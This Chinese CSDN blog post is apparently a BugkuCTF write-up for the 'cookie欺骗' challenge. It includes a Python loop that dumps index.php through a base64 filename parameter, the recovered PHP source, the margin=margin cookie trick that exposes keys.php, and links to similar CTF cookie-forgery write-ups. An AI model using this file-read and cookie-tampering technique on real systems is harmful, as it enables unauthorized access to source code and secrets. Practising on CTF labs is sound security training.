bugkuctf cookie欺骗

最新推荐文章于 2024-08-25 10:24:29 发布
最新推荐文章于 2024-08-25 10:24:29 发布
阅读量773 收藏 1
点赞数 1
分类专栏: 网络安全web 文章标签: bugkuctf cookie欺骗 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yu_csdnstory/article/details/95487443
版权

bugkuctf cookie 欺骗

打开页面后是一堆的乱码,我们可以从f12看到它的url包含了line=&filename=a2V5cy50eHQ=
在线解密base64,发现了文件名是keys.txt
我们可以试着改变文件名称将它的index.php给复现出来。
例如:
在这里插入图片描述
由于index.php的行数,我们可以用request库 的脚本将它还原出来,得到index.php的源码

import requests
for i in range (30):
        url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
        s=requests.get(url)
        print(s.text)

得到:

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

根据源码我们可以看到,他先对urlfilename后面的base64进行了解码,如果file没有传递,就显示index.php?line=&filename=a2V5cy50eHQ="
它的文件数组存储了了两个文件名,keys.txt和index.php,如果,cookie的margin=margin,那么数组就加入了keys.php,猜想,keys.php,就是我们想要的到的flag
所以,抓包,更改信息,得到flag:
在这里插入图片描述

舞动的獾
关注
专栏目录
BugkuCTF-WEBcookie欺骗
am_03的博客
08-29 976
知识点 isset: 检测变量是否设置,并且不是 NULL $_GET:收集来自 method=“get” 的表单里的值 intval() 函数用于获取变量的整数值。 in_array() 函数搜索数组里是否存在指定的值。 举例: <?php $am = array("Bill", "Steve", "trump", "David"); if (in_array("trump", $am)) { echo "匹配已找到"; } else { echo "匹配未找到"; } ?&
BugKuCTF中套路满满的题-------Cookie欺骗
qq_42133828的博客
12-19 2342
这一题,首先看题目,Cookie欺骗,那么什么是Cookie欺骗呢?      看了网上的一些博客后,我想可以总结一句话就是: 你在火狐成功登陆了一个账号,并且把session_id记录下来,转而去其他浏览器登陆此账号,但此时的登陆不需要密码和账号,只需要把Session_id传给服务器,便可成功登陆  好了,话不多说,直接上。。。      首先,界面给出的是一串字符,当我想并没有什么用...
2020/7/27 - [watevrCTF-2019]Cookie Store - 伪造cookie
抒情诗
07-27 1085
一开始还以为这是一个很难的题目,没想到就是一个简单的COOkIe伪造。 1.伪造cookie 根据他的题目提示,这可能是一道伪造cookie的题,所以先用burpsuIte进行抓包。 买这个一块钱的先试一下,结果: 很明显看到了我们剩余的钱数是50,改成500,再把post的数据id=0改为id=2用来买我们的3号商品flag。 2.获得flag forward之后有如下内容: 很明显session是一个base64,直接解码后获得flag ...
CTFHubCookie欺骗
cisansui的博客
09-28 772
Cookie欺骗 通过Burpsuite的监听抓包后修改admin的值返回请求数据包即可 (没弄明白为何在burpsuite修改了admin的值刷新了页面就成功了) 题目本身不难,有意思的是关于Cookie欺骗 其他的相关攻击方式好像还有SQL注入,XSS(跨站脚本攻击)和CSRF(跨站请求伪造)等,日后有空一一了解 Cookie,有时也用其复数形式 Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂
polarctf靶场[WEB]cookie欺骗、upload、签到
最新发布
m0_73981089的博客
08-25 780
[web]cookie欺骗    考点:cookie值    工具:Burp Suite抓包 [web]upload    考点:双写绕过    工具:Burp Suite抓包、蚁剑 [web]签到    考点:修改前端、html、disabled 、maxlength
Bugku-CTF之cookies欺骗
weixin_33842328的博客
04-24 1248
Day22 cookies欺骗 http://123.206.87.240:8002/web11/ 答案格式:KEY{xxxxxxxx} 本题要点:cookie欺骗、base64编码传参 查看源码 什么也没有 看一下url~ 发现base64编码 解一下 观察url ,发现 a2V5cy50eHQ=...
[LitCTF 2023]Flag点击就送!(cookie伪造)
Welcome To Myon'Blog !
05-22 2398
cookie伪造、session、flask、Python、json
CTF学习记录006-Cookie欺骗、认证、伪造
wupeng_ccab的博客
09-14 901
打开页面显示如下:hello guest. only admin can get flag. 意思很明显需要admin身份才可以。相信用Burp抓包改cookie值 是一样的。今后再遇到类似题目,这是思路方向。把cookie中名称为admin的值0改成1,然后重新加载页面,显示flag。打开页面后,使用浏览器F12开发者工具,找到cookie。题目:Cookie欺骗、认证、伪造。
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 6601
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
bugku CTF Web-20-cookies欺骗
weixin_47387913的博客
04-14 347
Web-20-cookies欺骗 一、尝试 提交flag的时候又忘记截图了,直接描述一下吧。 给出的网站进入后是一串不知道什么东西的代码,也不像什么加密,直接使用,但是网站进入后网址后面出现了一串编码,base64解密。 发现是读取的keys.txt里面的内容,改变line的值为1或0均相同,改变为2时无内容出现,说明无第二行内容。 直接尝试读取index.php里的内容 与keys.txt相同,把filename改为index.php,同样base64...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 1984
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
IDF实验室:天罗地网--COOKIE欺骗
Shinukami's Space
05-25 2741
地址: ctf.idf.cn/index.php?g=game&m=article&a=index&id=40 题目: http://ctf.idf.cn/game/web/40/index.php 参考: blog.csdn.net/sn_rna/article/details/45195083 点击进去发现是一大段字符串,呵呵:-),查看源代码,呵呵:-)。。。 接着看看题目
CTF-web题· cookie
2302_80276789的博客
07-21 188
在右上角上会看到url上有cookie的字样,因此可以判断出来这题使用了cookie,按下F12,找到储存,会看到一个cookie栏目。会发现hint值有一个fl4g.txt很像flag,或者如果我们没有关闭burp,那么我们就可以看到。这其实就是flag的变形,那么,我们就可以对他进行访问。打开题目之后会发现如下界面。然后就会得到flag。
CG CTF WEB COOKIE
无限迭代中......
07-02 983
http://chinalover.sinaapp.com/web10/index.php 题解: 工具:Burp Suite 抓包 提示cookie信息,所以查看一下请求头信息,发现Cookie中Login=0,又提示了0==not,所以尝试修改Cookie信息,使Login=1,方法可使用 ...
ctf-攻防世界-webcookie
一只菜鸟的博客
11-01 4240
提示在cookie里放了东西,那么就去查看cookie吧。F12打开开发者工具,在储存里有名为look-here,值为cookie.php的cookie 访问cookie.php,提示See the http response,即查看http返回包。 在开发者工具的网络一栏查看cookie.php,即可发现flag 或者用burp抓包,右键send to repeater 可查看返回包的headers发现flag ...
Bugku——cookie欺骗
csu_vc的博客
10-28 8413
看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-10-28 09:36:41 # @Author : csu_vc # @Link : http://blog.c
CTF-WEB篇 攻防世界题目实战解析cookie
2301_76565920的博客
04-18 1172
题目:cookie 难度:1
CTFHub-web(cookie)
分享与记录
03-11 1021
尝试使用burpsuite 分析cookie参数,发送到repeater之后将admin的值改为1 得到结果
ctfshow cookie泄露
qq_55777983的博客
07-24 544
根据题目我们直接按f12打开开发者工具然后选中network后按ctrl+r进行刷新,选中左侧的第一个即可查看消息头(用bp抓包也行不过没必要) cookie常用来做一些网站的身份验证,如果泄露后果不堪设想 (好水 ...
详解Cookie攻击:格式、欺骗原理与JavaScript利用
标题:深入理解与防范Cookie攻击:格式、欺骗原理及实例 描述:本文详细探讨了Cookie注入攻击,重点讲解了Cookie的格式,以及如何利用JavaScript进行设置和欺骗Cookie文件的名称通常遵循用户@网站路径[更改次数]....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值